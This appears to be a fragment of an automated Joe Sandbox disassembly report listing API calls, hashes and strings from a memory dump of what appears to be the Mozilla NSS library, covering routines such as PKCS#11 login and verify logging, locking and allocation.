                                                                                • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                • String ID:
                                                                                • API String ID: 1304971872-0
                                                                                • Opcode ID: 37f0bf5ea0421e457d8225abdd43a1366bffc2b1cd6113dc0042d87b4c7824f2
                                                                                • Instruction ID: f2b71072a684a8f461c91abaa03e5130d4b5d6ca4fb178cd83c8a33523a16c0e
                                                                                • Opcode Fuzzy Hash: 37f0bf5ea0421e457d8225abdd43a1366bffc2b1cd6113dc0042d87b4c7824f2
                                                                                • Instruction Fuzzy Hash: D0B16EB1E012099FEF00CBA5D845BDEBBB9EF05348F140124F825E7660EB71E916CB61
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4C4C
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4C60
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CA1
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CBE
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4CD2
                                                                                • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4D3A
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4D4F
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4DB7
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4DD7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4DEC
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4E1B
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF4E2F
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFF4E5A
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFF4E71
                                                                                • free.MOZGLUE(00000000), ref: 6CFF4E7A
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4EA2
                                                                                • TlsGetValue.KERNEL32 ref: 6CFF4EC1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFF4ED6
                                                                                • PR_Unlock.NSS3(?), ref: 6CFF4F01
                                                                                • free.MOZGLUE(00000000), ref: 6CFF4F2A
                                                                                Similarity
                                                                                • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                • String ID:
                                                                                • API String ID: 759471828-0
                                                                                • Opcode ID: 0616091fa3224ad47d5bac745922f79e4cc24cc4a2390a1a209263e7603a0bc2
                                                                                • Instruction ID: b8a9879e2d762e1f763a790b410372beca2c3aedcad8250cf87742807c4791fa
                                                                                • Opcode Fuzzy Hash: 0616091fa3224ad47d5bac745922f79e4cc24cc4a2390a1a209263e7603a0bc2
                                                                                • Instruction Fuzzy Hash: 23B1F275900205DFEB00DF68ED44BAA7BB4FF09318F054128ED2597B61EB71E962CBA1
                                                                                APIs
                                                                                • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFC5DEC
                                                                                • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CFC5E0F
                                                                                • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CFC5E35
                                                                                • SECKEY_CopyPublicKey.NSS3(?), ref: 6CFC5E6A
                                                                                • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CFC5EC3
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CFC5ED9
                                                                                • SECKEY_SignatureLen.NSS3(?), ref: 6CFC5F09
                                                                                • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CFC5F49
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFC5F89
                                                                                • free.MOZGLUE(?), ref: 6CFC5FA0
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC5FB6
                                                                                • free.MOZGLUE(00000000), ref: 6CFC5FBF
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CFC600C
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CFC6079
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFC6084
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFC6094
                                                                                Similarity
                                                                                • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                • String ID:
                                                                                • API String ID: 2310191401-3916222277
                                                                                • Opcode ID: 075800c03d6d80de8c7d038cc30433fd217773f72b34792d28d1db3481c5d2b9
                                                                                • Instruction ID: 502fecceb482ae2a997da06b639fa1960d46587e2d36a3198f1147700be67940
                                                                                • Opcode Fuzzy Hash: 075800c03d6d80de8c7d038cc30433fd217773f72b34792d28d1db3481c5d2b9
                                                                                • Instruction Fuzzy Hash: AA8102B2F042069BEF148A64DC81BAF77B5AF44318F144128E959E7781EB31E814DBA3
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_LoginUser), ref: 6CFE9C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE9C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE9CA3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE9CB9
                                                                                • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CFE9CDA
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE9CF5
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE9D10
                                                                                • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CFE9D29
                                                                                • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CFE9D42
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                • API String ID: 1003633598-3838449515
                                                                                • Opcode ID: 498853e87059ce059666a0eb5c64992f5e5864ae133f3f71bfdd09b32c0b735a
                                                                                • Instruction ID: 46d120c5d22ee37860a5adb5dc1396cda12c4a8147238aa70f2ce660a56f9653
                                                                                • Opcode Fuzzy Hash: 498853e87059ce059666a0eb5c64992f5e5864ae133f3f71bfdd09b32c0b735a
                                                                                • Instruction Fuzzy Hash: EB41E2B1901215FFEB10DF55EE46F9E3BB1EB4B309F054019F91867252DBB08A14CBA2
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000080), ref: 6D0C9C70
                                                                                • PR_NewLock.NSS3 ref: 6D0C9C85
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_NewCondVar.NSS3(00000000), ref: 6D0C9C96
                                                                                  • Part of subcall function 6CF9BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CFA21BC), ref: 6CF9BB8C
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CA9
                                                                                  • Part of subcall function 6D0798D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D079946
                                                                                  • Part of subcall function 6D0798D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF316B7,00000000), ref: 6D07994E
                                                                                  • Part of subcall function 6D0798D0: free.MOZGLUE(00000000), ref: 6D07995E
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CB9
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CC9
                                                                                • PR_NewCondVar.NSS3(00000000), ref: 6D0C9CDA
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF9BBEB
                                                                                  • Part of subcall function 6CF9BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF9BBFB
                                                                                  • Part of subcall function 6CF9BB80: GetLastError.KERNEL32 ref: 6CF9BC03
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF9BC19
                                                                                  • Part of subcall function 6CF9BB80: free.MOZGLUE(00000000), ref: 6CF9BC22
                                                                                • PR_NewCondVar.NSS3(?), ref: 6D0C9CF0
                                                                                • PR_NewPollableEvent.NSS3 ref: 6D0C9D03
                                                                                  • Part of subcall function 6D0BF3B0: PR_CallOnce.NSS3(6D1114B0,6D0BF510), ref: 6D0BF3E6
                                                                                  • Part of subcall function 6D0BF3B0: PR_CreateIOLayerStub.NSS3(6D11006C), ref: 6D0BF402
                                                                                  • Part of subcall function 6D0BF3B0: PR_Malloc.NSS3(00000004), ref: 6D0BF416
                                                                                  • Part of subcall function 6D0BF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D0BF42D
                                                                                  • Part of subcall function 6D0BF3B0: PR_SetSocketOption.NSS3(?), ref: 6D0BF455
                                                                                  • Part of subcall function 6D0BF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D0BF473
                                                                                  • Part of subcall function 6D079890: TlsGetValue.KERNEL32(?,?,?,6D0797EB), ref: 6D07989E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D0C9D78
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9DAF
                                                                                • _PR_CreateThread.NSS3(00000000,6D0C9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9D9F
                                                                                  • Part of subcall function 6CF9B3C0: TlsGetValue.KERNEL32 ref: 6CF9B403
                                                                                  • Part of subcall function 6CF9B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CF9B459
                                                                                • _PR_CreateThread.NSS3(00000000,6D0CA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9DE8
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9DFC
                                                                                • _PR_CreateThread.NSS3(00000000,6D0CA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9E29
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9E3D
                                                                                • _PR_MD_UNLOCK.NSS3(?), ref: 6D0C9E71
                                                                                • PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0C9E89
                                                                                Similarity
                                                                                • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                • String ID:
                                                                                • API String ID: 4254102231-0
                                                                                • Opcode ID: ee98be636e4bd286bfd63656d948a164ba1fecb7b728a819ee3ffb643560e1d6
                                                                                • Instruction ID: aa53cb07fa5a3b142f913535000fd2a767eae8bd96429d20cedf5e6fc3a65f24
                                                                                • Opcode Fuzzy Hash: ee98be636e4bd286bfd63656d948a164ba1fecb7b728a819ee3ffb643560e1d6
                                                                                • Instruction Fuzzy Hash: FA616EB1900706AFE714DF75D844A6BBBF8FF09209B05453AE81AC7B51EB70E914CBA1
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CFE4CF3
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE4D28
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE4D37
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE4D4D
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CFE4D7B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE4D8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE4DA0
                                                                                • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CFE4DBC
                                                                                • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CFE4E20
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                • API String ID: 1003633598-3553622718
                                                                                • Opcode ID: 3f98243b1d13b80f61feeaded7a184b5ef96f4e60e846a80f56ef544a3148d32
                                                                                • Instruction ID: 56ffa0b4ef4e5811871344a43151a03a60d54d2ca161bb520ff6748b9f937704
                                                                                • Opcode Fuzzy Hash: 3f98243b1d13b80f61feeaded7a184b5ef96f4e60e846a80f56ef544a3148d32
                                                                                • Instruction Fuzzy Hash: CD410971540204FFE710DB91ED86B6E3BB5EB4630DF05402DF5186B152DBB49914CB62
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Verify), ref: 6CFE7CB6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE7CE4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE7CF3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE7D09
                                                                                • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CFE7D2A
                                                                                • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CFE7D45
                                                                                • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CFE7D5E
                                                                                • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CFE7D77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                • API String ID: 1003633598-3278097884
                                                                                • Opcode ID: 86bd1f63f481b5c26148ca2f02b10bea79627be55f48520d3cccf4e806739b35
                                                                                • Instruction ID: 9ca935f3ac16566f28ac975881601bd438bc9bfd79c4d334fb8d227375bf223d
                                                                                • Opcode Fuzzy Hash: 86bd1f63f481b5c26148ca2f02b10bea79627be55f48520d3cccf4e806739b35
                                                                                • Instruction Fuzzy Hash: FC31E471905205FFEB20DF55EE46F6E37B1EB4A318F09402AF518A7213DBB09914CBA2
                                                                                APIs
                                                                                • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D07CC7B), ref: 6D07CD7A
                                                                                  • Part of subcall function 6D07CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CFEC1A8,?), ref: 6D07CE92
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CDA5
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CDB8
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6D07CDDB
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CD8E
                                                                                  • Part of subcall function 6CFA05C0: PR_EnterMonitor.NSS3 ref: 6CFA05D1
                                                                                  • Part of subcall function 6CFA05C0: PR_ExitMonitor.NSS3 ref: 6CFA05EA
                                                                                • PR_LoadLibrary.NSS3(wship6.dll), ref: 6D07CDE8
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CDFF
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CE16
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CE29
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6D07CE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                • API String ID: 601260978-871931242
                                                                                • Opcode ID: 42ed1769c457a420e8684d21518ae1f75ee908cf3e008ac653d200fc33ea2c9f
                                                                                • Instruction ID: c432bd734c38a790e275e251d40de74a9e17863fea15f4d68a0ee96a327c1614
                                                                                • Opcode Fuzzy Hash: 42ed1769c457a420e8684d21518ae1f75ee908cf3e008ac653d200fc33ea2c9f
                                                                                • Instruction Fuzzy Hash: 8D113FA6D036226AF71186B53D01BBA7ED89B1204CF040035E81ADA741FB91C545C7EE
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D0C13BC,?,?,?,6D0C1193), ref: 6D0C1C6B
                                                                                • PR_NewLock.NSS3(?,6D0C1193), ref: 6D0C1C7E
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_NewCondVar.NSS3(00000000,?,6D0C1193), ref: 6D0C1C91
                                                                                  • Part of subcall function 6CF9BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CFA21BC), ref: 6CF9BB8C
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,6D0C1193), ref: 6D0C1CA7
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF9BBEB
                                                                                  • Part of subcall function 6CF9BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF9BBFB
                                                                                  • Part of subcall function 6CF9BB80: GetLastError.KERNEL32 ref: 6CF9BC03
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF9BC19
                                                                                  • Part of subcall function 6CF9BB80: free.MOZGLUE(00000000), ref: 6CF9BC22
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,?,6D0C1193), ref: 6D0C1CBE
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,?,?,6D0C1193), ref: 6D0C1CD4
                                                                                • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D0C1193), ref: 6D0C1CFE
                                                                                • PR_Lock.NSS3(?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D1A
                                                                                  • Part of subcall function 6D079BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CFA1A48), ref: 6D079BB3
                                                                                  • Part of subcall function 6D079BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CFA1A48), ref: 6D079BC8
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D3D
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_SetError.NSS3(FFFFE890,00000000,?,6D0C1193), ref: 6D0C1D4E
                                                                                • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D64
                                                                                • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D6F
                                                                                • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D0C1193), ref: 6D0C1D7B
                                                                                • PR_DestroyCondVar.NSS3(?,?,?,?,?,6D0C1193), ref: 6D0C1D87
                                                                                • PR_DestroyCondVar.NSS3(00000000,?,?,?,6D0C1193), ref: 6D0C1D93
                                                                                • PR_DestroyLock.NSS3(00000000,?,?,6D0C1193), ref: 6D0C1D9F
                                                                                • free.MOZGLUE(00000000,?,6D0C1193), ref: 6D0C1DA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                • String ID:
                                                                                • API String ID: 3246495057-0
                                                                                • Opcode ID: 720cbcfb79c526873580b7996e4ca89d7e5a7df07b19bef43b22b95fe88c3509
                                                                                • Instruction ID: d15487765d86ffa736f59d1d3f96554217fa84dbc0e5034ee36cdb0eee446476
                                                                                • Opcode Fuzzy Hash: 720cbcfb79c526873580b7996e4ca89d7e5a7df07b19bef43b22b95fe88c3509
                                                                                • Instruction Fuzzy Hash: FB31C5F1D007029BFB219F64AC41B6BB6F4AF16618F044839E94A87741FB71E514CBA3
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02ADB1
                                                                                  • Part of subcall function 6D00BE30: SECOID_FindOID_Util.NSS3(6CFC311B,00000000,?,6CFC311B,?), ref: 6D00BE44
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D02ADF4
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D02AE08
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D02AE25
                                                                                • PL_FreeArenaPool.NSS3 ref: 6D02AE63
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6D02AE4D
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02AE93
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6D02AECC
                                                                                • PL_FreeArenaPool.NSS3 ref: 6D02AEDE
                                                                                • PL_FinishArenaPool.NSS3 ref: 6D02AEE6
                                                                                • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02AEF5
                                                                                • PL_FinishArenaPool.NSS3 ref: 6D02AF16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                • String ID: security
                                                                                • API String ID: 3441714441-3315324353
                                                                                • Opcode ID: ef0082dfc24d2bef9084aba52ffc8772d1e757cb9e884d92ad2c19faba212a23
                                                                                • Instruction ID: 201ae6a41198b53fcaa769a012a9d40516b08178622667afd808fb6fdbe2d005
                                                                                • Opcode Fuzzy Hash: ef0082dfc24d2bef9084aba52ffc8772d1e757cb9e884d92ad2c19faba212a23
                                                                                • Instruction Fuzzy Hash: 414135B180931167FB215B68AC85F7E72E8BF4272CF600425EA1493281FF399605CAE3
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?), ref: 6CFC8E22
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC8E36
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8E4F
                                                                                • calloc.MOZGLUE(00000001,?,?,?), ref: 6CFC8E78
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CFC8E9B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFC8EAC
                                                                                • PL_ArenaAllocate.NSS3(?,?), ref: 6CFC8EDE
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CFC8EF0
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F00
                                                                                • free.MOZGLUE(?), ref: 6CFC8F0E
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CFC8F39
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F4A
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F5B
                                                                                • PR_Unlock.NSS3(?), ref: 6CFC8F72
                                                                                • PR_Unlock.NSS3(?), ref: 6CFC8F82
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
